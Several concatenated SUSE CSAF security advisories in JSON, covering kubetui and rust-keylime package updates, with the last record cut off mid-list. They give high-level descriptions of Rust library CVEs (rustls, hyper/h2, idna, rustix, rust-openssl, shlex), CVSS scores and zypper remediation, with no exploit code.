{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "kubetui-1.5.1-1.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the kubetui-1.5.1-1.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-13912", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13912-1.json" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "kubetui-1.5.1-1.1 on GA media", "tracking": { "current_release_date": "2024-06-15T00:00:00Z", "generator": { "date": "2024-06-15T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:13912-1", "initial_release_date": "2024-06-15T00:00:00Z", "revision_history": [ { "date": "2024-06-15T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "kubetui-1.5.1-1.1.aarch64", "product": { "name": "kubetui-1.5.1-1.1.aarch64", "product_id": "kubetui-1.5.1-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "kubetui-1.5.1-1.1.ppc64le", "product": { "name": "kubetui-1.5.1-1.1.ppc64le", "product_id": "kubetui-1.5.1-1.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "kubetui-1.5.1-1.1.s390x", "product": { "name": "kubetui-1.5.1-1.1.s390x", "product_id": "kubetui-1.5.1-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "kubetui-1.5.1-1.1.x86_64", "product": { "name": "kubetui-1.5.1-1.1.x86_64", "product_id": "kubetui-1.5.1-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "kubetui-1.5.1-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:kubetui-1.5.1-1.1.aarch64" }, "product_reference": "kubetui-1.5.1-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "kubetui-1.5.1-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:kubetui-1.5.1-1.1.ppc64le" }, "product_reference": "kubetui-1.5.1-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "kubetui-1.5.1-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:kubetui-1.5.1-1.1.s390x" }, "product_reference": "kubetui-1.5.1-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "kubetui-1.5.1-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:kubetui-1.5.1-1.1.x86_64" }, "product_reference": "kubetui-1.5.1-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:kubetui-1.5.1-1.1.aarch64", "openSUSE Tumbleweed:kubetui-1.5.1-1.1.ppc64le", "openSUSE Tumbleweed:kubetui-1.5.1-1.1.s390x", "openSUSE Tumbleweed:kubetui-1.5.1-1.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:kubetui-1.5.1-1.1.aarch64", "openSUSE Tumbleweed:kubetui-1.5.1-1.1.ppc64le", "openSUSE Tumbleweed:kubetui-1.5.1-1.1.s390x", "openSUSE Tumbleweed:kubetui-1.5.1-1.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:kubetui-1.5.1-1.1.aarch64", "openSUSE Tumbleweed:kubetui-1.5.1-1.1.ppc64le", "openSUSE Tumbleweed:kubetui-1.5.1-1.1.s390x", "openSUSE Tumbleweed:kubetui-1.5.1-1.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
suse-su-2025:02810-1
Vulnerability from csaf_suse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Security update for rust-keylime", "title": "Title of the patch" }, { "category": "description", "text": "This update for rust-keylime fixes the following issues:\n\n- Update to version 0.2.7+141:\n * CVE-2025-58266: shlex: Fixed command injection (bsc#1247193)\n \n- Update to version 0.2.7+117:\n * CVE-2023-26964: rust-keylime: hyper,h2: stream stacking when H2 processing HTTP2 RST_STREAM frames (bsc#1210344).\n * CVE-2024-12224: rust-keylime: idna: idna accepts Punycode labels that do not produce any non-ASCII when decoded (bsc#1243861).\n * CVE-2024-32650: rust-keylime: rust-rustls: Infinite loop in rustls::conn::ConnectionCommon:complete_io() with proper client input (bsc#1223234).\n * CVE-2024-43806: rust-keylime: rustix: rustix::fs::Dir iterator with the linux_raw backend can cause memory explosion (bsc#1229952).\n * CVE-2025-3416: rust-keylime: openssl: Use-After-Free in Md::fetch and Cipher::fetch in rust-openssl crate (bsc#1242623).\n * rust-shlex: Multiple issues involving quote API ( RUSTSEC-2024-0006, GHSA-r7qv-8r2h-pg27, bsc#1230029)\n", "title": "Description of the patch" }, { "category": "details", "text": "SUSE-2025-2810,SUSE-SLE-Micro-5.4-2025-2810", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_02810-1.json" }, { "category": "self", "summary": "URL for SUSE-SU-2025:02810-1", "url": "https://www.suse.com/support/update/announcement/2025/suse-su-202502810-1/" }, { "category": "self", "summary": "E-Mail link for SUSE-SU-2025:02810-1", "url": "https://lists.suse.com/pipermail/sle-updates/2025-August/041229.html" }, { "category": "self", "summary": "SUSE Bug 1210344", "url": "https://bugzilla.suse.com/1210344" }, { "category": "self", "summary": "SUSE Bug 1223234", "url": "https://bugzilla.suse.com/1223234" }, { "category": "self", "summary": "SUSE Bug 1229952", "url": "https://bugzilla.suse.com/1229952" }, { "category": "self", "summary": "SUSE Bug 1230029", "url": "https://bugzilla.suse.com/1230029" }, { "category": "self", "summary": "SUSE Bug 1242623", "url": "https://bugzilla.suse.com/1242623" }, { "category": "self", "summary": "SUSE Bug 1243861", "url": "https://bugzilla.suse.com/1243861" }, { "category": "self", "summary": "SUSE Bug 1247193", "url": "https://bugzilla.suse.com/1247193" }, { "category": "self", "summary": "SUSE CVE CVE-2023-26964 page", "url": "https://www.suse.com/security/cve/CVE-2023-26964/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-12224 page", "url": "https://www.suse.com/security/cve/CVE-2024-12224/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-43806 page", "url": "https://www.suse.com/security/cve/CVE-2024-43806/" }, { "category": "self", "summary": "SUSE CVE CVE-2025-3416 page", "url": "https://www.suse.com/security/cve/CVE-2025-3416/" }, { "category": "self", "summary": "SUSE CVE CVE-2025-58266 page", "url": "https://www.suse.com/security/cve/CVE-2025-58266/" } ], "title": "Security update for rust-keylime", "tracking": { "current_release_date": "2025-08-15T12:51:47Z", "generator": { "date": "2025-08-15T12:51:47Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "SUSE-SU-2025:02810-1", "initial_release_date": "2025-08-15T12:51:47Z", "revision_history": [ { "date": "2025-08-15T12:51:47Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150400.3.5.1.aarch64", "product": { "name": "keylime-ima-policy-0.2.7+141-150400.3.5.1.aarch64", "product_id": "keylime-ima-policy-0.2.7+141-150400.3.5.1.aarch64" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "product": { "name": "rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "product_id": "rust-keylime-0.2.7+141-150400.3.5.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150400.3.5.1.ppc64le", "product": { "name": "keylime-ima-policy-0.2.7+141-150400.3.5.1.ppc64le", "product_id": "keylime-ima-policy-0.2.7+141-150400.3.5.1.ppc64le" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150400.3.5.1.ppc64le", "product": { "name": "rust-keylime-0.2.7+141-150400.3.5.1.ppc64le", "product_id": "rust-keylime-0.2.7+141-150400.3.5.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150400.3.5.1.s390x", "product": { "name": "keylime-ima-policy-0.2.7+141-150400.3.5.1.s390x", "product_id": "keylime-ima-policy-0.2.7+141-150400.3.5.1.s390x" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150400.3.5.1.s390x", "product": { "name": "rust-keylime-0.2.7+141-150400.3.5.1.s390x", "product_id": "rust-keylime-0.2.7+141-150400.3.5.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "keylime-ima-policy-0.2.7+141-150400.3.5.1.x86_64", "product": { "name": "keylime-ima-policy-0.2.7+141-150400.3.5.1.x86_64", "product_id": "keylime-ima-policy-0.2.7+141-150400.3.5.1.x86_64" } }, { "category": "product_version", "name": "rust-keylime-0.2.7+141-150400.3.5.1.x86_64", "product": { "name": "rust-keylime-0.2.7+141-150400.3.5.1.x86_64", "product_id": "rust-keylime-0.2.7+141-150400.3.5.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "SUSE Linux Enterprise Micro 5.4", "product": { "name": "SUSE Linux Enterprise Micro 5.4", "product_id": "SUSE Linux Enterprise Micro 5.4", "product_identification_helper": { "cpe": "cpe:/o:suse:sle-micro:5.4" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150400.3.5.1.aarch64 as component of SUSE Linux Enterprise Micro 5.4", "product_id": "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64" }, "product_reference": "rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.4" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150400.3.5.1.s390x as component of SUSE Linux Enterprise Micro 5.4", "product_id": "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x" }, "product_reference": "rust-keylime-0.2.7+141-150400.3.5.1.s390x", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.4" }, { "category": "default_component_of", "full_product_name": { "name": "rust-keylime-0.2.7+141-150400.3.5.1.x86_64 as component of SUSE Linux Enterprise Micro 5.4", "product_id": "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" }, "product_reference": "rust-keylime-0.2.7+141-150400.3.5.1.x86_64", "relates_to_product_reference": "SUSE Linux Enterprise Micro 5.4" } ] }, "vulnerabilities": [ { "cve": "CVE-2023-26964", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2023-26964" } ], "notes": [ { "category": "general", "text": "An issue was discovered in hyper v0.13.7. h2-0.2.4 Stream stacking occurs when the H2 component processes HTTP2 RST_STREAM frames. As a result, the memory and CPU usage are high which can lead to a Denial of Service (DoS).", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2023-26964", "url": "https://www.suse.com/security/cve/CVE-2023-26964" }, { "category": "external", "summary": "SUSE Bug 1210339 for CVE-2023-26964", "url": "https://bugzilla.suse.com/1210339" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 4.7, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:47Z", "details": "moderate" } ], "title": "CVE-2023-26964" }, { "cve": "CVE-2024-12224", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-12224" } ], "notes": [ { "category": "general", "text": "Improper Validation of Unsafe Equivalence in punycode by the idna crate from Servo rust-url allows an attacker to create a punycode hostname that one part of a system might treat as distinct while another part of that system would treat as equivalent to another hostname.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-12224", "url": "https://www.suse.com/security/cve/CVE-2024-12224" }, { "category": "external", "summary": "SUSE Bug 1243848 for CVE-2024-12224", "url": "https://bugzilla.suse.com/1243848" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 4.2, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:47Z", "details": "moderate" } ], "title": "CVE-2024-12224" }, { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:47Z", "details": "important" } ], "title": "CVE-2024-32650" }, { "cve": "CVE-2024-43806", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-43806" } ], "notes": [ { "category": "general", "text": "Rustix is a set of safe Rust bindings to POSIX-ish APIs. When using `rustix::fs::Dir` using the `linux_raw` backend, it\u0027s possible for the iterator to \"get stuck\" when an IO error is encountered. Combined with a memory over-allocation issue in `rustix::fs::Dir::read_more`, this can cause quick and unbounded memory explosion (gigabytes in a few seconds if used on a hot path) and eventually lead to an OOM crash of the application. The symptoms were initially discovered in https://github.com/imsnif/bandwhich/issues/284. That post has lots of details of our investigation. Full details can be read on the GHSA-c827-hfw6-qwvm repo advisory. If a program tries to access a directory with its file descriptor after the file has been unlinked (or any other action that leaves the `Dir` iterator in the stuck state), and the implementation does not break after seeing an error, it can cause a memory explosion. As an example, Linux\u0027s various virtual file systems (e.g. `/proc`, `/sys`) can contain directories that spontaneously pop in and out of existence. Attempting to iterate over them using `rustix::fs::Dir` directly or indirectly (e.g. with the `procfs` crate) can trigger this fault condition if the implementation decides to continue on errors. An attacker knowledgeable about the implementation details of a vulnerable target can therefore try to trigger this fault condition via any one or a combination of several available APIs. If successful, the application host will quickly run out of memory, after which the application will likely be terminated by an OOM killer, leading to denial of service. This issue has been addressed in release versions 0.35.15, 0.36.16, 0.37.25, and 0.38.19. Users are advised to upgrade. There are no known workarounds for this issue.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-43806", "url": "https://www.suse.com/security/cve/CVE-2024-43806" }, { "category": "external", "summary": "SUSE Bug 1229376 for CVE-2024-43806", "url": "https://bugzilla.suse.com/1229376" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 6.5, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:47Z", "details": "moderate" } ], "title": "CVE-2024-43806" }, { "cve": "CVE-2025-3416", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2025-3416" } ], "notes": [ { "category": "general", "text": "A flaw was found in OpenSSL\u0027s handling of the properties argument in certain functions. This vulnerability can allow use-after-free exploitation, which may result in undefined behavior or incorrect property parsing, leading to OpenSSL treating the input as an empty string.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2025-3416", "url": "https://www.suse.com/security/cve/CVE-2025-3416" }, { "category": "external", "summary": "SUSE Bug 1242599 for CVE-2025-3416", "url": "https://bugzilla.suse.com/1242599" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 3.7, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "products": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:47Z", "details": "low" } ], "title": "CVE-2025-3416" }, { "cve": "CVE-2025-58266", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2025-58266" } ], "notes": [ { "category": "general", "text": "unknown", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2025-58266", "url": "https://www.suse.com/security/cve/CVE-2025-58266" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.aarch64", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.s390x", "SUSE Linux Enterprise Micro 5.4:rust-keylime-0.2.7+141-150400.3.5.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2025-08-15T12:51:47Z", "details": "important" } ], "title": "CVE-2025-58266" } ] }
suse-su-2025:02809-1
Vulnerability from csaf_suse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "important" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Security update for rust-keylime", "title": "Title of the patch" }, { "category": "description", "text": "This update for rust-keylime fixes the following issues:\n\n- Update to version 0.2.7+141:\n * CVE-2025-58266: shlex: Fixed command injection (bsc#1247193)\n \n- Update to version 0.2.7+117:\n * CVE-2023-26964: rust-keylime: hyper,h2: stream stacking when H2 processing HTTP2 RST_STREAM frames (bsc#1210344).\n * CVE-2024-12224: rust-keylime: idna: idna accepts Punycode labels that do not produce any non-ASCII when decoded (bsc#1243861).\n * CVE-2024-32650: rust-keylime: rust-rustls: Infinite loop in rustls::conn::ConnectionCommon:complete_io() with proper client input (bsc#1223234).\n * CVE-2024-43806: rust-keylime: rustix: rustix::fs::Dir iterator with the linux_raw backend can cause memory explosion (bsc#1229952).\n * CVE-2025-3416: rust-keylime: openssl: Use-After-Free in Md::fetch and Cipher::fetch in rust-openssl crate (bsc#1242623).\n * rust-shlex: Multiple issues involving quote API ( RUSTSEC-2024-0006, GHSA-r7qv-8r2h-pg27, bsc#1230029)\n", "title": "Description of the patch" }, { "category": "details", "text": "SUSE-2025-2809,SUSE-SLE-Micro-5.3-2025-2809", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_02809-1.json" }, { "category": "self", "summary": "URL for SUSE-SU-2025:02809-1", "url": "https://www.suse.com/support/update/announcement/2025/suse-su-202502809-1/" }, { "category": "self", "summary": "E-Mail link for SUSE-SU-2025:02809-1", "url": "https://lists.suse.com/pipermail/sle-updates/2025-August/041230.html" }, { "category": "self", "summary": "SUSE Bug 1210344", "url": "https://bugzilla.suse.com/1210344" }, { "category": "self", "summary": "SUSE Bug 1223234", "url": "https://bugzilla.suse.com/1223234" }, { "category": "self", "summary": "SUSE Bug 1229952", "url": "https://bugzilla.suse.com/1229952" }, { "category": "self", "summary": "SUSE Bug 1230029", "url": "https://bugzilla.suse.com/1230029" }, { "category": "self", "summary": "SUSE Bug 1242623", "url": "https://bugzilla.suse.com/1242623" }, { "category": "self", "summary": "SUSE Bug 1243861", "url": "https://bugzilla.suse.com/1243861" }, { "category": "self", "summary": "SUSE Bug 1247193", "url": "https://bugzilla.suse.com/1247193" 